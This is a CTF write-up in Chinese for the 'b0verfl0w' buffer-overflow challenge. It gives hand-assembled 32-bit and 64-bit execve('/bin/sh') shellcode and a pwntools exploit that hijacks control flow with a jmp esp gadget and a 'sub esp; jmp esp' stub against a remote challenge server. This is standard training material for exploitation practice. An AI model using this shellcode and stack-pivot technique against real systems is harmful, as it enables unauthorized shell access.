x_ctf_b0verfl0w

这里记录汇编代码写shellcode+jump esp指令劫持esp的情况

可以溢出的字节放不下pwntools生成的shellcode时,需要我们自己写shellcode缩短长度

32位:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
shellcode ='''
xor eax,eax             #eax置0
xor edx,edx				#edx置0
push edx				#将0入栈,标记了”/bin/sh”的结尾
push 0x68732f2f         #传递”/sh”,为了4字节对齐,使用//sh,这在execve()中等同于/sh
push 0x6e69622f         #传递“/bin”
mov ebx,esp             #此时esp指向了”/bin/sh”,通过esp将该字符串的值传递给ebx
xor ecx,ecx
mov al,0xB              #eax置为execve函数的中断号
int 0x80                #调用软中断
'''
shellcode=asm(shellcode)
#shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
shellcode="\x31\xC0\x31\xD2\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x31\xC9\xB0\x0B\xCD\x80"

64位:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
shellcode=asm('''
xor rax,rax
push 0x3b
pop rax
xor rdi,rdi
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
xor rsi,rsi
xor rdx,rdx
syscall
''')
shellcode = '\x48\x31\xC0\x6A\x3B\x58\x48\x31\xFF\x48\xBF\x2F\x62\x69\x6E\x2F\x73\x68\x00\x57\x54\x5F\x48\x31\xF6\x48\x31\xD2\x0F\x05'

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
context(os='linux', arch='i386', log_level='debug')
#io = process("./b0verfl0w")
io = remote("node4.buuoj.cn",25948)
shellcode = "\x31\xC0\x31\xD2\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x31\xC9\xB0\x0B\xCD\x80"
print len(shellcode)  #23

jmp_esp=0x8048504
sub_esp_jmp=asm('sub esp,0x28;jmp esp')

payload=shellcode+(0x20-len(shellcode)+4)*'a'+p32(jmp_esp)+sub_esp_jmp

io.sendline(payload)

io.interactive()